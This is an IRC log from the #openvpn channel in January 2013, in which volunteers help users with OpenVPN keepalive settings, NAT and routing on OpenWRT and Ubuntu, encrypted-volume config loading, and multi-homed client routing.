jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:10 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has joined #openvpn 08:20 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 08:29 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:29 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Client Quit] 08:30 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 08:30 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 08:41 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 252 seconds] 08:42 -!- HyperGlide [~HyperGlid@221.237.123.59] has quit [Remote host closed the connection] 08:46 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 08:46 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 244 seconds] 09:05 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 09:05 -!- mode/#openvpn [+v s7r] by ChanServ 09:49 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has joined #openvpn 09:53 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn [] 09:56 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has quit [Quit: Leaving] 09:56 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has joined #openvpn 10:13 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:22 -!- master_of_master [~master_of@p57B5338D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master [~master_of@p57B521B9.dip.t-dialin.net] has joined #openvpn 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 10:27 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 10:27 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:31 -!- pie__ [~pie_@unaffiliated/pie-/x-0787662] has quit [Quit: pie__] 10:32 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 260 seconds] 10:46 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 11:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:20 -!- mode/#openvpn [+o krzee] by ChanServ 11:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 11:46 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:55 -!- JesseWhite [anonymuse@cpe-68-173-27-87.nyc.res.rr.com] has quit [] 12:07 -!- Porkepix [~Porkepix@LMontsouris-156-24-53-197.w193-253.abo.wanadoo.fr] has quit [Quit: Computer has gone to sleep.] 12:22 -!- kyrix_ [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:24 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 276 seconds] 12:24 -!- b1rkh0ff [~b1rkh0ff@178.77.10.139] has quit [Ping timeout: 246 seconds] 12:25 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 12:26 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.6.46] has joined #openvpn 12:40 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 12:43 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 12:46 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 13:01 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 13:03 -!- s7r1 [~s7r@82.137.15.99] has joined #openvpn 13:04 -!- a_ [~d@64.111.123.163] has joined #openvpn 13:04 -!- Varazir_ [~mircwars@c-94-255-128-179.cust.bredband2.com] has joined #openvpn 13:04 -!- oskie_ [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 13:04 -!- kloeri_ [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 13:04 -!- pelle2_ [~p@178-132-78-93.cust.azirevpn.net] has joined #openvpn 13:04 -!- mjixx_ [~markus@80.67.14.31] has joined #openvpn 13:08 -!- JackWinter1 [~jack@vodsl-4655.vo.lu] has joined #openvpn 13:09 -!- Netsplit *.net <-> *.split quits: kloeri, catsup, oskie, blackness, JackWinter, _quadDamage, +s7r, sitaktif, b1rkh0ff, mjixx, (+2 more, use /NETSPLIT to show all of them) 13:10 -!- kloeri_ is now known as kloeri 13:16 -!- Netsplit over, joins: b1rkh0ff 13:16 -!- blackness [black@2001:470:8cf8::9] has joined #openvpn 13:18 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 13:22 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn 13:23 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 260 seconds] 13:25 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 13:26 < Tativie> After setting up OpenVPN in Linux I am seeing ICMP make connections (I think it looks like a simple ping) at least every 20 seconds (to the same server that is running the OpenVPN). This occurs along side the normal OpenVPN traffic. Is this normal behavior? I was not seeing this behavior when I enabled OpenVPN through the gnome-desktop GUI. 13:29 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 13:30 -!- nonotza [~nonotza@cpe-66-108-94-161.nyc.res.rr.com] has joined #openvpn 13:33 < wh1p> could just be the clinet or server checking that the connection was still active or that the server was still online :? 13:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:38 < kunji> Tativie: There are options for what wh1p suggested in the configuration file, maybe take a look at that and see what yours is supposed to be doing. I would think it's normal because I believe the sample configurations does it, though don't quote me on that it's based on my somewhat erroneous memory. 13:41 -!- sw0rdfish- [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 13:42 < Tativie> Okay. thanks for the help. :) 13:42 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has left #openvpn [] 13:57 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 13:59 -!- dado_ [~dado@82-149-122-100.wco.wellcom.at] has joined #openvpn 13:59 < dado_> hi 13:59 -!- con3x [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 13:59 < dado_> i have a somewhat unethical question: 14:00 < con3x> Hello, is it possible to route only traffic going out to certain IP's over openVPN from the client side? 14:01 < con3x> (In the config file on OpenWRT) 14:01 < dado_> i have certs and ovpn config file on an encrypted volume, which needs to be mounted with a passphrase under a gnome user session. everytime the user wants to connect he needs to reimport the config since its not there yet when the session is starting. can i somehow use a static configuration which points to a standard set of files, even if they are not there and have it working as soon as the volume is mounted? 14:04 < con3x> dado_: Could you write a script to restart the openVPN service after the drive has been mounted, maybe even write a script that mounts the drive and then restarts openVPN? 14:04 < con3x> I'm not sure if gnome has the necessary hooks for doing it automaticall 14:04 < con3x> /s/automaticall/automatically 14:07 < dado_> con3x: so restarting the openvpn service should actually reset the "missing" files in the stored session in network-manager? 14:11 < con3x> It should try to reload the whole service again, assuming the files exist when it starts then it should load them (Assuming the files are always in the same place when a drive is mounted). 14:11 < dado_> con3x: that could help. thanks. let my try that 14:11 < con3x> No problem :) 14:13 < dado_> i guess the filenames of the certs and config file dont matter? 14:17 < con3x> As long as they are consistant with the way you are starting openVPN 14:17 < dado_> ok 14:17 < dado_> btw, you are right the files get back loaded correctly after restarting the service 14:17 < con3x> So if you are starting openVPN with the command OpenVPN --config vpn.conf 14:17 < dado_> hmm now i need to find a way to restart the service automatically after the volume gets mounted 14:18 < con3x> What OS are you using? 14:18 < dado_> well actually i use the network-manager openvpn plugin for that 14:18 < dado_> debian 14:19 < dado_> im trying to make a secure thin-client style live cd 14:20 < con3x> Sounds cool :) 14:20 < dado_> yeh, but also a lot of work :) 14:21 < dado_> im almost done tho, just need that last thing for the setup 14:21 < con3x> Do the users of the cd have to mount the drive themselves 14:22 < dado_> unfortunately yes 14:22 < dado_> the perfect situation would be to have it mounted at boot time before X starts 14:22 < dado_> but then it needs to ask an encyryption passphrase, where my skills are not enough to make a script for that 14:23 < dado_> but this way the files would already be where they should be.. 14:26 < con3x> That doesn't sound too hard, have a look at inittab :). 14:26 < con3x> if not a small script that users can click on that looks like: 14:26 < con3x> mount 14:26 < con3x> /etc/init.d/openvpn restart 14:26 < con3x> should do the trick. 14:28 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 255 seconds] 14:28 < dado_> ill look into that 14:29 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has joined #openvpn 14:30 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 14:37 -!- s7r1 [~s7r@82.137.15.99] has quit [Ping timeout: 264 seconds] 14:41 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 14:47 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 14:53 < dado_> con3x: got it working but in a different way 14:54 < dado_> con3x: having the volume now mounted at boot time, asking for the passphrase. so the gnome session starts and the files are already there. yay! 14:54 < con3x> So when the disk boots it asks for the passphrase? :) 14:54 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 14:55 < dado_> con3x: ye 14:55 < dado_> +s 14:55 < dado_> the file /etc/crypttab did the trick, which is kinda OT for this channel 14:56 < con3x> Yeah, cool you've got it working though :) congrats. 14:56 < dado_> con3x: thx man. 14:58 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:03 < hg_5> hello, i have generated 1 config file for 1 client, how to make another ones without starting over all process? 15:04 < dado_> hg_5: just changing the config file for another user wont do it i guess. the certificate and key needs to be generated 15:05 < hg_5> but if i will start process over certificate will be different than is on server ;o 15:11 < dado_> i assume you are generating the certificates from the server, no? 15:12 < dado_> i use pfsense as openvpn server, with a web interface for generating users and certificates. i dont know how you do it. 15:32 -!- dado_ [~dado@82-149-122-100.wco.wellcom.at] has quit [Read error: Operation timed out] 15:38 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Quit: Leaving.] 15:39 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 15:53 -!- hg_5_ [~chatzilla@ip-84-39-175-133.free.aero2.net.pl] has joined #openvpn 15:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 15:54 -!- hg_5__ [~chatzilla@91.234.245.245] has joined #openvpn 15:58 -!- hg_5_ [~chatzilla@ip-84-39-175-133.free.aero2.net.pl] has quit [Ping timeout: 255 seconds] 16:05 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:09 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has joined #openvpn 16:09 < _eMaX_> hi all 16:11 < _eMaX_> anyone can help me with an openvpn issue here? I've a problem connecting to devices behind my openvpn server. When a client connects, it gets an ip of 172.16.11.100. the openvpn server has .2, and it can ping back to the client (.100) as well as to another machine on the network (.1). From that other machine, I can ping the openvpn server, but not the client (.100). vice-versa, from the client I cannot ping .1. I did set ipforward on the openv 16:22 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 16:29 -!- ScriptFanix [vincent@2001:910:100b::1] has quit [Ping timeout: 245 seconds] 16:31 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:35 < dioz> routes 16:35 < dioz> but not a openvpn issue 16:37 < _eMaX_> thanks 16:37 < _eMaX_> I'm searching for a whole day now but don't find where to set routes and which 16:38 < dioz> i assume your machines behind your server need to be told 16:38 < dioz> "yo this is how you get here and this is your gateway on this interface" 16:40 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 16:41 < _eMaX_> I basically have —————— 16:41 < _eMaX_> A can ping B, B can ping A, C, D, E; C can ping B and E, but not A; E can ping B, C D but not A 16:42 < _eMaX_> so I assume the vpn server B needs some route 16:43 < dioz> ipv4 packet forwarding? 16:43 < _eMaX_> enabled on B 16:47 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 16:48 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 16:48 < _eMaX_> also einfacher gesagt, wenn ich 3 rechner habe, A, B, C. A kann B pingen, aber nicht C. C kann B pingen, aber nicht A. B kann beide pingen. wohin muss welche route? 16:49 < _eMaX_> sorry 16:49 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 16:53 < thermoman> emmanuelux: english? 16:55 < thermoman> the --float option is for the case when the remote endpoint is changing his IP address ... is there an correpsonding option for then the client changes its IP? 16:55 < thermoman> e.g. the server has a fixed IP but the client is on a dynamic uplink and the client ip changes ... afaik the client then times out and reconnect 16:56 < thermoman> but is there the possibility that (at least with udp) the client just sends packets from its new address and the server recognizes this without the need for the client to reconnect? 17:07 -!- _eMaX_1 [~eMaX@213.221.150.68] has joined #openvpn 17:07 -!- sw0rdfish- is now known as sw0rdfish 17:07 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 17:07 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 17:08 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has quit [Ping timeout: 252 seconds] 17:08 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has joined #openvpn 17:11 -!- _eMaX_1 [~eMaX@213.221.150.68] has quit [Ping timeout: 252 seconds] 17:15 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 17:17 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds] 17:18 -!- Devastator- [~devas@186.214.14.9] has joined #openvpn 17:18 -!- Devastator- [~devas@186.214.14.9] has quit [Changing host] 17:18 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 17:18 < anth0ny_> I'm trying to set up a openwrt router to use openvpn to connect to another computer. The openvpn server is working and I can connect to it via tunnelblick on my computer. I'm using the same .ovpn file for openwork as I am for Tunnelblick, but get a "read UDPv4 [EHOSTUNREACH|EHOSTUNREACH]: No route to host (code=148)" error when I run openvpn --config myvpn.ovpn. Any ideas? 17:19 -!- Devastator- is now known as Devastator 17:26 < anth0ny_> I believe the problem to be with NATing the VPN client traffic to the internet: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE . should eth0 be the driver that has the ip assigned to it when I run ifconfig? 17:31 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 17:31 -!- anth0ny__ [~anth0ny@d207-6-122-180.bchsia.telus.net] has joined #openvpn 17:31 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 252 seconds] 17:38 -!- anth0ny__ [~anth0ny@d207-6-122-180.bchsia.telus.net] has quit [Ping timeout: 255 seconds] 17:38 -!- _eMaX_ [~eMaX@67-234.197-178.cust.bluewin.ch] has quit [Quit: Leaving.] 18:04 -!- nonotza [~nonotza@cpe-66-108-94-161.nyc.res.rr.com] has quit [Quit: nonotza] 18:18 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:23 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 264 seconds] 18:36 -!- corretico [~luis@190.211.93.38] has joined #openvpn 18:37 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:38 -!- corretico [~luis@190.211.93.38] has quit [Client Quit] 18:38 -!- corretico [~luis@190.211.93.38] has joined #openvpn 18:43 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Quit: This computer has gone to sleep] 18:43 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 18:44 -!- HyperGlide [~HyperGlid@182.149.53.195] has joined #openvpn 18:48 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 18:58 -!- hg_5__ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds] 19:22 <+dvl> Looking at getting a new switch, moving my home lan to a faster speed. Now running at 100M... 19:23 <+dvl> Hmmm, if one port on a switch runs at 100M, that SHOULD NOT affect any other port? e.g. two boxes with 1000M NICs will use that speed... 19:51 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 19:56 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Quit: Leaving] 19:57 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 20:04 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 252 seconds] 20:05 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 20:08 -!- ch1mkey [ch1m@ns203993.ovh.net] has joined #openvpn 20:10 -!- ch1mkey [ch1m@ns203993.ovh.net] has left #openvpn [] 20:22 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 20:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 20:52 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has joined #openvpn 21:27 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 272 seconds] 21:33 -!- yeshello1here is now known as Winkie 21:33 -!- Winkie [~hi@80.168.239.88] has left #openvpn [] 21:42 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 22:12 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 22:14 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 22:22 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 22:23 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 256 seconds] 23:00 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 23:23 -!- anth0ny_ [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 264 seconds] 23:33 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 23:39 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 23:39 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 23:45 < anth0ny> I'm finishing up the routed VPN setup on an OpenWRT router that I have. Looking at the howto.html page on the OpenVPN site, it says that I should NAT the VPN client traffic to the internet, using this: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE, with eth0 being the local ethernet interface. I'm not sure that this is the right choice for my router, would someone mind looking at my ifconfig output and letting me know what th 23:45 < anth0ny> ey think is the right choice: http://pastie.org/private/fitmdhshv6zyzxct8p5w ? 23:47 < anth0ny> Not sure if I should use br0, vlan1, or eth0 23:55 < anth0ny> !goal 23:55 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 23:59 < ngharo> you want the internet-facing interface --- Day changed Mon Jan 14 2013 00:02 < anth0ny> ngharo, is there a way to test what that is, exactly? 00:02 < anth0ny> there are two eth's and two vlans 00:03 < anth0ny> bra and vlan1 are the only ones with inet addr's 00:03 < ngharo> i'm assuming the vlan with the IP 00:04 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Read error: Connection reset by peer] 00:05 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 00:09 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has quit [Ping timeout: 240 seconds] 00:14 <+pekster> He wants eth0.1 in a standard OpenWRT setup (in case he comes back and I'm not around to notice it) 00:15 <+pekster> And yea, 'ip addr show' would identify it :P 01:18 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 01:34 -!- hydroxyhydride [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has joined #openvpn 01:34 -!- bumblebee [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has joined #openvpn 01:46 -!- bumblebee [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has quit [Ping timeout: 246 seconds] 01:47 -!- hydroxyhydride [~bumblebee@c-76-104-129-87.hsd1.wa.comcast.net] has quit [Ping timeout: 276 seconds] 02:00 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:27 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 02:47 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 02:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 02:51 -!- mode/#openvpn [+o vpnHelper] by ChanServ 03:02 -!- thinkHell [~Hell@ks399220.kimsufi.com] has joined #openvpn 03:16 -!- defswork [~andy@141.0.50.105] has joined #openvpn 03:31 -!- dazo_afk is now known as dazo 03:55 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 03:58 -!- Z_Analyzer [~lipalm@173-164-219-57-SFBA.hfc.comcastbusiness.net] has quit [Quit: Leaving] 04:02 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 04:03 < holmen> Hi, anyone here up for teaching me how to work out my two NIC tunneling problem? 04:04 <+pekster> holmen: You tend to get better results in a channel full of community volunteer support if you just ask your question ;) 04:04 <+pekster> !ask 04:04 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 04:07 < holmen> I have a setup of two physical NIC's in my Ubuntu 12.04 server. NIC #1 is connected to a router that gets EXT IP #1. NIC #2 is i directly connected to the internet and gets EXT IP #2. Now when seting up a openvpn CLIENT with the option "local " the tunnel activates on NIC #1. I have made the corretct routings for NIC #2 and its able to both send and recieve traffic. 04:11 < holmen> To add to this, i am not the server admin of the server im trying to connect to so i cant change settings on the server side. 04:21 <+pekster> holmen: Sorry for the delay, I'm not able to give 100% time to IRC. So you're connecting from an external client to the public IP that doesn't contain the default route on the server? 04:23 -!- Assid [~assid@198.24.140.58] has joined #openvpn 04:23 -!- Assid [~assid@198.24.140.58] has quit [Changing host] 04:23 -!- Assid [~assid@unaffiliated/assid] has joined #openvpn 04:23 < Assid> heya 04:24 < Assid> so i have a openvpn connection which seems to timeout or something.. and it doesnt seem to reconnect on its own.. which results in connectivity issues since im using redirect-gateway 04:25 <+pekster> Assid: the --ping and --ping-restart options (also see the --keepalive helper that abstracts both) will auto-reconnect after contact with the peer is lost 04:27 <+pekster> Note that you need --ping (or --keepalive, which on the server does a push for both options) on *both* ends of the connection (it's okay of course for the server to push this if clients pull it.) The ping is not bi-directional, so the opposing peer needs a --ping for the local peer to mamke use of --ping-restart or --ping-exit options 04:29 < Assid> what if the sevrer doesnt do keepalive or ping 04:30 <+pekster> Then you can't use that option, and there's no way to know if your connection to the peer was severed internal to OpenVPN 04:30 <+pekster> You could write a creative script to do a standard ping to the peer IP and take restart action if it doesn't respond after so many attempts 04:30 <+pekster> But that's kind of ugly and exactly what the --ping/--ping-restart options are designed to handle 04:30 < Assid> yeha i thought the internal ping does ? 04:31 < Assid> exactly what i meant 04:31 <+pekster> OpenVPN's ping is not an ICMP echo-request (commonly called a "ping" packet in casual network speech) 04:31 <+pekster> It's sent within the OpenVPN control channel 04:32 <+pekster> !keepalive 04:32 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 04:33 -!- Assid|2 [~assid@85.159.236.219] has joined #openvpn 04:33 < Assid|2> ok 04:34 -!- Assid [~assid@unaffiliated/assid] has quit [Disconnected by services] 04:34 -!- Assid|2 is now known as Assid 04:34 -!- Assid [~assid@85.159.236.219] has quit [Changing host] 04:34 -!- Assid [~assid@unaffiliated/assid] has joined #openvpn 04:34 < Assid> hmm 04:34 < holmen> pekster: I'm connecting to a external service, yes. And i want openvpn to tunnel the NIC#2 to that service bu when enabeling the tunnel it goes for the NIC#1 by default. I have added my query on the stack exchange network with full setting files etc. If you want to take a look: http://unix.stackexchange.com/questions/60955/openvpn-struggling 04:34 <@vpnHelper> Title: ubuntu - OpenVPN struggling - Unix and Linux (at unix.stackexchange.com) 04:34 < Assid> ok i think it should work with keepalive 04:34 < Assid> else will figure something else 04:34 < Assid> btw. anyone here using privateinternetacess ? 04:35 < Assid> im thinking its prone to MITM since they dont use nsCertType=server 04:36 <+pekster> holmen: What do you mean "it goes for the NIC#1 by default?" If the client connects to another interface on the server that has a unique public IP, the server needs to be configured on a network level (outside OpenVPN) to correctly multi-home or it simply won't work 04:37 <+pekster> Assid: I'd need to see a full client config file, but that's possible; it's very easy to implement security software incorrectly 04:38 <+pekster> If their certs are set up properly, you could likely add that option in yourself on the client side 04:38 <+pekster> Some places use the KU/EKU fields instead, or a different solution to the problem of clients posing as a valid server 04:39 < holmen> pekster: Ok, the reasong im doing this is that i only want i specific program to tunnel its traffic through openvpn, to a anonymizer service. And since they are the ones hosting the server, should i ask them for advice? 04:39 < holmen> i =1 04:41 <+pekster> holmen: Oh, is your client the one that's multi-homed? 04:41 < holmen> Yes, if you by that mean that its hte one with two NIC's 04:44 <+pekster> Ah, okay. The issue is your routing table. 'ip route show' will identify your default gateway out eth0, I'd expect 04:45 <+pekster> To multi-home like that, you need to define routing rules to identify traffic that needs to be routed to a gateway on eth1, which generally requires a separate routing table and 'ip rule add ...' rules to identify which traffic to send to that lookup table 04:45 < holmen> i have already added that information to the routing tables 04:46 <+pekster> 'ip route show table all' has your extra tables? and 'ip rule show' has rules to split traffic between them? 04:47 <+pekster> holmen: You should use -I $pub_ip_of_eth1 instead on your ping 04:47 <+pekster> Make sure that works first 04:48 <+pekster> If not, you have broken multi-homing 04:48 <+pekster> If you need it, here's LARTC's howto on advanced routing: http://lartc.org/howto/ 04:48 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 04:49 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 04:49 < holmen> Thank you! I'll check this and get back to you. 04:50 <+pekster> For example, I have a server inside my network with 2 IPs; if I tcpdump the interface, I can watch it use different sources (eg: 'tcpdump -pni eth2 icmp') when I do 'ping -I 10.0.0.20 kernel.org' verses 'ping -I 10.0.0.21 kernel.org'. Make sure it works as expected on your setup (ofc, change tcpdump interfaces for your test since it goes across 2 different adapters) 04:50 -!- IT [~userit@86.120.191.55] has quit [Quit: Nettalk6 - www.ntalk.de] 04:54 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:55 -!- Assid|2 [~assid@122.170.9.45] has joined #openvpn 04:56 < holmen> I've tried that now and the icmp-packets are sent as it should. The ping goes from ETH#2 to ETH#2. 04:56 -!- Assid [~assid@unaffiliated/assid] has quit [Ping timeout: 246 seconds] 04:58 <+pekster> holmen: Okay. The other thing I see now that I double-check the netstat output post-VPN-connect is that the host-route to the VPN endpoint is automatically set to use your existing default gateway, which is via eth0 04:59 <+pekster> holmen: What you probably need to do is use the 'local' flag to the redirect-gateway directive, and handle the host-route yourself via a --route-up script 04:59 <+pekster> That's necessary because you specifically DON'T want the VPN endpoint to be reachable via eth0's IP/interface 05:00 <+pekster> You probably need to use the env-vars the scripts mamke available to you in order to dynamically determine your remote peer's public IP 05:00 <+pekster> (since you have multiple remote lines) 05:01 <+pekster> 'ip route add $whatever_that_var_is/32 via $pub_ip_of_eth2' 05:01 < holmen> Ok, now comes the noob question. Where can i find the necessary manuals on this? I dont want to hammer you with all my questions :) 05:01 <+pekster> The manpage? 05:01 <+pekster> !man 05:01 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 05:01 <+pekster> On Linux, you should have 'man openvpn' available 05:01 < Assid|2> setting up another box now 05:02 <+pekster> Yea, I missed that route at the beginning of your output. FYI, 'ip route' is a much cleaner way to show routes; netstat or route are kind of outdated tools :P 05:02 < holmen> Thanks in advance, i'll read up on this and probably get back in the morning. Thank you for all the help 05:04 <+pekster> Yea, np. It's a subtle problem with the way --redirect-gateway expects your network to be 05:04 <+pekster> The only bad news is that you mostly need to fix it yourself :P 05:05 <+pekster> On the plus side, it should be a one-line fix in --route-up and --down (since you probably want to remove the route on disconnect) 05:06 <+pekster> 'man ip' and 'ip route help' are also good places to look for info using the ip command 05:06 <+pekster> btw, you win 